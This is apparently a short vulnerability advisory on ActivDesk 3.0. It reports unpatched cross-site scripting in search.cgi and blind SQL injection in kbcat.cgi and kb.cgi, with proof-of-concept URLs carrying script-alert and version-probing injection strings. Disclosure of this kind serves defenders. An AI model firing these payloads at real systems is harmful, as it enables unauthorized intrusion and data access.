Home News Advisories

ActivDesk 3.0 multiple security vulnerabilities

There are multiple security vulnerabilities in ActivDesk 3.0 which may allow an attacker to take control of the software.

Software

Software Link: ActivDesk

Vulnerable Version: <= 3.0

Vendor Notification: 2011-06-24 - Ticket# 67120010491

Vulnerabilities

# Cross-Site Scripting (XSS) # <= 3.0 # Unpatched

http://localhost/[PATH]/search.cgi?keywords0=<script>alert(0)</script> http://localhost/[PATH]/search.cgi?keywords1=<script>alert(1)</script> http://localhost/[PATH]/search.cgi?keywords2=<script>alert(2)</script> http://localhost/[PATH]/search.cgi?keywords3=<script>alert(3)</script>

# Blind SQL Injection # <= 3.0 # Unpatched

http://localhost/[PATH]/kbcat.cgi?cid=' or substring(@@version,1,1)=5 and ''=' http://localhost/[PATH]/kb.cgi?kid=' or substring(@@version,1,1)=5 and ''='

Reference

# OWASP: Cross-Site Scripting (XSS)

# OWASP: Blind SQL Injection

Appendix

[TXT] ActivDesk 3.0 multiple security vulnerabilities

Copyright © IT Security Solutions.org